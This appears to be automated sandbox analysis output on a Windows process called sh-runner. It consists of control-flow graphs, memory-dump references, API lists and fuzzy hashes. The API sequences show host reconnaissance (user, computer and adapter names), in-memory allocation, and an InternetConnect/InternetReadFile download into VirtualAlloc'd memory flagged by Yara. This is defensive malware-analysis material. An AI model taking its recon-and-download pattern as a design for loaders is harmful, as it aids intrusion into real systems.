                                                                      control_flow_graph 0 1ff24f97d70-1ff24f97d9f 1 1ff24f97da1-1ff24f97dae call 1ff24f9e850 0->1 2 1ff24f97db5-1ff24f97dc5 0->2 1->2 4 1ff24f97dcb-1ff24f97dd4 2->4 5 1ff24f97e5e-1ff24f97ecb call 1ff24f9e6f0 * 2 call 1ff24f9e630 2->5 4->5 8 1ff24f97dda-1ff24f97e0f 4->8 20 1ff24f97f48-1ff24f97f4d call 1ff24f9e630 5->20 21 1ff24f97ecd-1ff24f97ee9 5->21 16 1ff24f97e15-1ff24f97e36 call 1ff24fa0320 8->16 22 1ff24f97e38-1ff24f97e39 16->22 25 1ff24f97f52-1ff24f97f6e GetUserNameA 20->25 21->20 30 1ff24f97eeb-1ff24f97f0d 21->30 24 1ff24f97e3b-1ff24f97e5c call 1ff24fa0320 22->24 24->5 28 1ff24f97fe9-1ff24f97fee call 1ff24f9e630 25->28 29 1ff24f97f70-1ff24f97f8c 25->29 33 1ff24f97ff3-1ff24f98014 GetComputerNameExA 28->33 29->28 38 1ff24f97f8e-1ff24f97fae 29->38 39 1ff24f97f0f-1ff24f97f1f call 1ff24f9e5c0 30->39 40 1ff24f97f21-1ff24f97f26 call 1ff24f9e630 30->40 36 1ff24f98094-1ff24f98099 call 1ff24f9e630 33->36 37 1ff24f98016-1ff24f98032 33->37 44 1ff24f9809e-1ff24f980ba GetAdaptersInfo 36->44 37->36 51 1ff24f98034-1ff24f98059 GetComputerNameExA 37->51 52 1ff24f97fb0-1ff24f97fc0 call 1ff24f9e5c0 38->52 53 1ff24f97fc2-1ff24f97fc7 call 1ff24f9e630 38->53 48 1ff24f97f2b-1ff24f97f46 39->48 40->48 49 1ff24f98129-1ff24f9812e call 1ff24f9e630 44->49 50 1ff24f980bc-1ff24f980d8 44->50 48->25 61 1ff24f98133-1ff24f9829b call 1ff24f9e790 call 1ff24f9e630 * 4 call 1ff24f90cc0 call 1ff24f9e630 call 1ff24f9e690 call 1ff24f9e630 * 8 call 1ff24f9e690 call 1ff24f9e630 49->61 50->49 67 1ff24f980da-1ff24f980ef GetAdaptersInfo 50->67 56 1ff24f9805b-1ff24f9806b call 1ff24f9e5c0 51->56 57 1ff24f9806d-1ff24f98072 call 1ff24f9e630 51->57 60 1ff24f97fcc-1ff24f97fe7 52->60 53->60 69 1ff24f98077-1ff24f98092 56->69 57->69 60->33 72 1ff24f98102-1ff24f98107 call 1ff24f9e630 67->72 73 1ff24f980f1-1ff24f98100 call 1ff24f9e760 67->73 69->44 80 1ff24f9810c-1ff24f98127 72->80 73->80 80->61
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056344114.000001FF24F90000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF24F90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_1ff24f90000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: Name$AdaptersComputerInfo$User
                                                                      • String ID:
                                                                      • API String ID: 1713523329-3916222277
                                                                      • Opcode ID: 847f31a267256c4b477c3e55c6d651f5123c8fbdc2e5fbf7ef3bfa4e34fd3b77
                                                                      • Instruction ID: 88daa098e3c5a22d12c06e9e94bed804bb46855b5a07cbab95a570dc2a821c16
                                                                      • Opcode Fuzzy Hash: 847f31a267256c4b477c3e55c6d651f5123c8fbdc2e5fbf7ef3bfa4e34fd3b77
                                                                      • Instruction Fuzzy Hash: 72F10E30324A498FEB84EB18C495BA673E1FF9C304F544578E589C729ADEB4E946CB42

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: malloc$ExceptionFilterSleepUnhandledmemcpystrlen
                                                                      • String ID:
                                                                      • API String ID: 3806033187-0
                                                                      • Opcode ID: 649668102e0e11a526956de2ff727b7b8ba60e3df94765b97e1fcbfe89641749
                                                                      • Instruction ID: 1c2a9839efbdc0471e40fab78810ac9c0c44574b491e72b7693159dd136e4080
                                                                      • Opcode Fuzzy Hash: 649668102e0e11a526956de2ff727b7b8ba60e3df94765b97e1fcbfe89641749
                                                                      • Instruction Fuzzy Hash: 31512939A09A0385E618BB6DED402B9A2A1EF487C5FC44435DE5D477B1DE2CF9C18B24
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000003.1847224001.000001FF24F70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FF24F70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_3_1ff24f70000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryVirtual$AllocateProtect
                                                                      • String ID:
                                                                      • API String ID: 2931642484-0
                                                                      • Opcode ID: 670168b2314164816ad4fff62a771d92f35dcb7a52677c9802cb5d6c25b1cd75
                                                                      • Instruction ID: ebd5acca2a057ef63e40ab02b199e355e9d06f9c65c3dcc450ac5096b707781e
                                                                      • Opcode Fuzzy Hash: 670168b2314164816ad4fff62a771d92f35dcb7a52677c9802cb5d6c25b1cd75
                                                                      • Instruction Fuzzy Hash: D67106316186094FE75C9F18D8427BA77E1FFC4314F10563DF986C3292DAB8D8438A86

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 266 1ff24f9d510-1ff24f9d53e 267 1ff24f9d540-1ff24f9d544 266->267 268 1ff24f9d546-1ff24f9d548 266->268 267->268 269 1ff24f9d54d-1ff24f9d583 267->269 270 1ff24f9d63a-1ff24f9d64a 268->270 271 1ff24f9d585-1ff24f9d589 269->271 271->268 272 1ff24f9d58b-1ff24f9d5ac call 1ff24f9b450 271->272 275 1ff24f9d632-1ff24f9d635 272->275 276 1ff24f9d5b2-1ff24f9d5cf 272->276 275->271 277 1ff24f9d5d8-1ff24f9d5e5 276->277 278 1ff24f9d5d1-1ff24f9d5d6 276->278 277->278 279 1ff24f9d5e7-1ff24f9d611 call 1ff24fa2ab0 277->279 278->270 279->268 282 1ff24f9d617-1ff24f9d62b LdrGetProcedureAddress 279->282 282->278 283 1ff24f9d62d 282->283 283->268
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056344114.000001FF24F90000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF24F90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_1ff24f90000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProcedure
                                                                      • String ID:
                                                                      • API String ID: 3653107232-0
                                                                      • Opcode ID: c880d098a533d0f3fb35a3b8b130c654e78c7eb0b2f2c7cb6df4c980cc83c31e
                                                                      • Instruction ID: 59d6d5c3b699a2e2b1f66ce69cf175eb716f800e7707501a13577c30258c06ce
                                                                      • Opcode Fuzzy Hash: c880d098a533d0f3fb35a3b8b130c654e78c7eb0b2f2c7cb6df4c980cc83c31e
                                                                      • Instruction Fuzzy Hash: 5241A431218A058FE798DB18D885BF673F0FFD5314F64453DE48AC3256EAA1E9438B86

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 385 1ff24fa36f0-1ff24fa375d 386 1ff24fa37ec-1ff24fa3827 385->386 387 1ff24fa3763-1ff24fa376d 385->387 387->386 388 1ff24fa376f-1ff24fa377b 387->388 388->386 389 1ff24fa377d-1ff24fa37e5 call 1ff24f90040 call 1ff24f90044 388->389 394 1ff24fa37ea NtAddBootEntry 389->394 394->386
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056344114.000001FF24F90000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF24F90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_1ff24f90000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0f85d6cc5d146f678718de6328ed8eda05c9f040f0331ba1138b2b3f728f502a
                                                                      • Instruction ID: 40c05c23435198ad5d014ae3515b043ab2b36889f7f4ee207b631357c95731f2
                                                                      • Opcode Fuzzy Hash: 0f85d6cc5d146f678718de6328ed8eda05c9f040f0331ba1138b2b3f728f502a
                                                                      • Instruction Fuzzy Hash: AC310C7051CB898FD7A4DF09D846BAABBE0FBD9710F14496EE08993211D7B1E8418B93

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 395 1ff24fa3830-1ff24fa3874 396 1ff24fa38eb-1ff24fa3909 395->396 397 1ff24fa3876-1ff24fa3880 395->397 397->396 398 1ff24fa3882-1ff24fa388e 397->398 398->396 399 1ff24fa3890-1ff24fa38e4 call 1ff24f90040 call 1ff24f90044 398->399 404 1ff24fa38e9 NtAddBootEntry 399->404 404->396
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056344114.000001FF24F90000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF24F90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_1ff24f90000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 208e31ad857d5dcce3a280dcc57152d1db46a14ad4ea6d6d8807739142cc44ce
                                                                      • Instruction ID: f2c0d065304e3bffcaadcde016a792626ae8ff79107ecbd64ca2b7f6d16ac506
                                                                      • Opcode Fuzzy Hash: 208e31ad857d5dcce3a280dcc57152d1db46a14ad4ea6d6d8807739142cc44ce
                                                                      • Instruction Fuzzy Hash: A1213970518B458FD764DF08C485BAABBF1FFC9314F14496EE08D97251CBB5A8418B83

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 405 1ff24fa4310-1ff24fa4345 406 1ff24fa4347-1ff24fa4351 405->406 407 1ff24fa43a3-1ff24fa43b8 405->407 406->407 408 1ff24fa4353-1ff24fa435f 406->408 408->407 409 1ff24fa4361-1ff24fa439c call 1ff24f90040 call 1ff24f90044 408->409 414 1ff24fa43a1 NtAddBootEntry 409->414 414->407
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056344114.000001FF24F90000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF24F90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_1ff24f90000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c3088a54474c0704e3a01d6a7ced4b2ede53a839219b38387c72ab5f3a59fde9
                                                                      • Instruction ID: fd7483ffd3066ec6b891cef12394b92fcd84ee3f34bd5201740d0651cac2abfe
                                                                      • Opcode Fuzzy Hash: c3088a54474c0704e3a01d6a7ced4b2ede53a839219b38387c72ab5f3a59fde9
                                                                      • Instruction Fuzzy Hash: 2C115E70528B498FE784EB18C48ABBAB7E0FFD8300F50447EA489C3261C7B4D441CB42

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 415 1ff24fa3ef0-1ff24fa3f25 416 1ff24fa3f27-1ff24fa3f31 415->416 417 1ff24fa3f81-1ff24fa3f96 415->417 416->417 418 1ff24fa3f33-1ff24fa3f3f 416->418 418->417 420 1ff24fa3f41-1ff24fa3f7a call 1ff24f90040 call 1ff24f90044 418->420 424 1ff24fa3f7f NtAddBootEntry 420->424 424->417
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056344114.000001FF24F90000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF24F90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_1ff24f90000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4c6d45573732ca76e4f0fa793a294bb48da95218d991d8302224f0b43042d479
                                                                      • Instruction ID: c153491b4bc55ef230d1fc4ca40b7843c4c2cea8ad47f920e78169e0435618da
                                                                      • Opcode Fuzzy Hash: 4c6d45573732ca76e4f0fa793a294bb48da95218d991d8302224f0b43042d479
                                                                      • Instruction Fuzzy Hash: B1114970528B458FEB88DB08C486BBAB7F0FB98344F54456EA089C3261C7B4E4428F82

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 425 1ff24fa4050-1ff24fa4085 426 1ff24fa4087-1ff24fa4091 425->426 427 1ff24fa40e1-1ff24fa40f6 425->427 426->427 428 1ff24fa4093-1ff24fa409f 426->428 428->427 429 1ff24fa40a1-1ff24fa40da call 1ff24f90040 call 1ff24f90044 428->429 434 1ff24fa40df NtAddBootEntry 429->434 434->427
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056344114.000001FF24F90000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF24F90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_1ff24f90000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4ca7dfaa4e91de42f9431d4f6194eae6a1f84e47b222d3be94b93e91ba7828c8
                                                                      • Instruction ID: 342f9e3c2e0f449ffb04473230c87bc4b53c2d27ddb3cf56fce1cfe42866b29d
                                                                      • Opcode Fuzzy Hash: 4ca7dfaa4e91de42f9431d4f6194eae6a1f84e47b222d3be94b93e91ba7828c8
                                                                      • Instruction Fuzzy Hash: DD114970528B458FE798DB18C486BAAB7E0FBD8304F50457EA489C7262C7B4D942CB82
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056344114.000001FF24F90000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF24F90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_1ff24f90000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 62bf9022b7866b8cf8bec5915bb64fbe05507ee611e7c9cc273e550b7568e5a4
                                                                      • Instruction ID: e51b9c5a09ae1ea3e814cbdfef45604f86a6a7fae999d293cfd9125f83380be0
                                                                      • Opcode Fuzzy Hash: 62bf9022b7866b8cf8bec5915bb64fbe05507ee611e7c9cc273e550b7568e5a4
                                                                      • Instruction Fuzzy Hash: 93115A30128A558FD748DB08C04ABBAB7E0FBC8704F15457DA48D832A1CBF4DA428B83
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056344114.000001FF24F90000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF24F90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_1ff24f90000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ab3c666c990c68bc9d607ff77fafc9474886ca1d5a46c4580004139ecadac52d
                                                                      • Instruction ID: 059cafec1cef9148b92dffea0a33fa9d5bd202788ef6cb591010659498cb15c3
                                                                      • Opcode Fuzzy Hash: ab3c666c990c68bc9d607ff77fafc9474886ca1d5a46c4580004139ecadac52d
                                                                      • Instruction Fuzzy Hash: AB011E30518A498FE748DB188049BB6B7E0FFC8308F54057DA44DD72A2D7F9DA51CB86

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 159 1ff22f9044e-1ff22f90474 163 1ff22f90475-1ff22f904af 159->163 168 1ff22f904d0-1ff22f904ed 163->168 169 1ff22f904b1-1ff22f904c7 163->169 173 1ff22f904cb call 1ff22f9053d 168->173 174 1ff22f904ef-1ff22f90535 VirtualAlloc InternetReadFile 168->174 169->173 175 1ff22f904c9 169->175 173->168 174->173 177 1ff22f9053b-1ff22f9053c 174->177 175->163
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3055198846.000001FF22F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FF22F90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_1ff22f90000_sh-runner.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocFileInternetReadVirtual
                                                                      • String ID: U.;
                                                                      • API String ID: 3591508208-4213443877
                                                                      • Opcode ID: 5690493dc9ff9f8f16933898c455d2a5e8e45ea3ee84a79ee5b969fd92fa3e91
                                                                      • Instruction ID: 9d7b39cb1fc6d4bdd872098d7555a463d7d71b8095e4d8043716c0a4b9992beb
                                                                      • Opcode Fuzzy Hash: 5690493dc9ff9f8f16933898c455d2a5e8e45ea3ee84a79ee5b969fd92fa3e91
                                                                      • Instruction Fuzzy Hash: 49310AA030EB882FF75A01693C6A7362AD9C79A351F1541AFF50DC71E7EC44CC46826A

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3055198846.000001FF22F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FF22F90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_1ff22f90000_sh-runner.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: InternetLibraryLoadOpen
                                                                      • String ID: wini
                                                                      • API String ID: 2559873147-1606035523
                                                                      • Opcode ID: 0662d3df314d0fc764c5b615890f2d42f03bb8aebb061ff02a7170b5085c526b
                                                                      • Instruction ID: 3b4527a9d28d992260bd117a4606203e1e6e8f3d6a47e1289107ccd5f1bd2f0d
                                                                      • Opcode Fuzzy Hash: 0662d3df314d0fc764c5b615890f2d42f03bb8aebb061ff02a7170b5085c526b
                                                                      • Instruction Fuzzy Hash: 80F0E5A060E68C2FE3295E75AC8A9373F9DDB5730931646AFF085C29B7CD514C418225

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 182 1ff22f903b2-1ff22f903e4 InternetConnectA call 1ff22f9044e 185 1ff22f9044e-1ff22f90455 182->185 186 1ff22f903e6 182->186 187 1ff22f90456-1ff22f90467 185->187 188 1ff22f903e8-1ff22f903f9 186->188 189 1ff22f9041f 186->189 196 1ff22f9046f-1ff22f90470 187->196 192 1ff22f9044b-1ff22f9044d 188->192 193 1ff22f903fb-1ff22f90404 188->193 189->187 191 1ff22f90421-1ff22f90423 189->191 194 1ff22f9049f-1ff22f904af 191->194 195 1ff22f90425-1ff22f90431 191->195 192->185 193->192 201 1ff22f90406-1ff22f90415 193->201 205 1ff22f904d0-1ff22f904ed 194->205 206 1ff22f904b1 194->206 202 1ff22f9049a-1ff22f9049d 195->202 203 1ff22f90433-1ff22f90435 195->203 199 1ff22f90472-1ff22f90474 196->199 204 1ff22f90475-1ff22f90499 199->204 201->196 207 1ff22f90417-1ff22f90418 201->207 202->194 203->206 208 1ff22f90437-1ff22f90442 203->208 204->202 216 1ff22f904cb call 1ff22f9053d 205->216 217 1ff22f904ef-1ff22f90535 VirtualAlloc InternetReadFile 205->217 209 1ff22f904b2-1ff22f904c7 206->209 207->199 210 1ff22f9041a-1ff22f9041e 207->210 208->209 211 1ff22f90444-1ff22f9044a 208->211 209->216 218 1ff22f904c9 209->218 210->189 211->192 216->205 217->216 220 1ff22f9053b-1ff22f9053c 217->220 218->204
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3055198846.000001FF22F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FF22F90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_1ff22f90000_sh-runner.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Internet$AllocConnectFileReadVirtual
                                                                      • String ID: U.;
                                                                      • API String ID: 1856879514-4213443877
                                                                      • Opcode ID: 6fc8f7e9d39f1beb81a02fe686e0033c171592fa012045b2ecca9d2f46ba6301
                                                                      • Instruction ID: fb3eebb9a2be866c2b95545ed3bd9195a7e5305631ec7d256f18613175555896
                                                                      • Opcode Fuzzy Hash: 6fc8f7e9d39f1beb81a02fe686e0033c171592fa012045b2ecca9d2f46ba6301
                                                                      • Instruction Fuzzy Hash: 3D41267430DF8A2FF71A42281D5577A3BA8EF93711F0142BFE545CA8EBD8848E468365

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • SetThreadDescription.KERNELBASE ref: 00007FF72BCF4567
                                                                        • Part of subcall function 00007FF72BD218D0: WaitOnAddress.API-MS-WIN-CORE-SYNCH-L1-2-0(?,?,-00000008,?,?,?,?,?,?,00007FF72BCF45C8), ref: 00007FF72BD2194B
                                                                        • Part of subcall function 00007FF72BD218D0: GetLastError.KERNEL32(?,?,-00000008,?,?,?,?,?,?,00007FF72BCF45C8), ref: 00007FF72BD21955
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: AddressDescriptionErrorLastThreadWait
                                                                      • String ID: main
                                                                      • API String ID: 2915094395-3207122276
                                                                      • Opcode ID: c52a097244dd1071374e55f5b798f0915c8acee24753f9a8faadf6f788744dce
                                                                      • Instruction ID: a768ef7b8424bf83816256b34659a8c605eef9cf72be20e7c561b2ba233f803f
                                                                      • Opcode Fuzzy Hash: c52a097244dd1071374e55f5b798f0915c8acee24753f9a8faadf6f788744dce
                                                                      • Instruction Fuzzy Hash: 79118E21E04A5699EB18FB69EC542EDA360FB44388FD40136DD4C13675DF3CE58ACB60

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • CreateFiberEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,000168BF,?,?,000001FF24F92904), ref: 000001FF24FA1F66
                                                                      • DeleteFiber.KERNELBASE(?,?,?,?,?,?,?,?,?,?,000168BF,?,?,000001FF24F92904), ref: 000001FF24FA1F8E
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056344114.000001FF24F90000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF24F90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_1ff24f90000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: Fiber$CreateDelete
                                                                      • String ID:
                                                                      • API String ID: 2527733159-0
                                                                      • Opcode ID: e666d9c0b0ba46b256699f288a6e5ecb4e148a06e009019892e951112d41f9a7
                                                                      • Instruction ID: c4f01062c2c116ca53d35894243b17db55c85949c2564e5d510d42af7e2cb1ba
                                                                      • Opcode Fuzzy Hash: e666d9c0b0ba46b256699f288a6e5ecb4e148a06e009019892e951112d41f9a7
                                                                      • Instruction Fuzzy Hash: 58319E30218A058FE790DF28C448BBAB7E1FF98300F6545BDE089CB296DBB4D942CB01

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: ObjectSingleWait
                                                                      • String ID:
                                                                      • API String ID: 24740636-0
                                                                      • Opcode ID: 28af41fac67d6db8249826d68bed4cd226c56e348e9a327fe25b39d9c433fe7b
                                                                      • Instruction ID: 55729a54053064dbf58cdbb27f47d7ff35f640b4b694fa0c524ff1665298371d
                                                                      • Opcode Fuzzy Hash: 28af41fac67d6db8249826d68bed4cd226c56e348e9a327fe25b39d9c433fe7b
                                                                      • Instruction Fuzzy Hash: C462C001C19FC681F2065B2EAD012F4A7A0FFFD719F4AE379DA9821532BF6832D58654
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: Handle$Close$ErrorFileInformationLast
                                                                      • String ID:
                                                                      • API String ID: 4143594976-3916222277
                                                                      • Opcode ID: 6041d2afa6f88c4f8645b1e749606fb7a06baba142a6ae9def8101eb02a304ff
                                                                      • Instruction ID: 31524bd459aeb4b8d899c5547a6a126e918421b438718d968e30db651a621894
                                                                      • Opcode Fuzzy Hash: 6041d2afa6f88c4f8645b1e749606fb7a06baba142a6ae9def8101eb02a304ff
                                                                      • Instruction Fuzzy Hash: 5152F522A1868249EB28AF39DC003F9A761FF88788F845135DE4D17BE9DF3D9585C720
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: memcmp
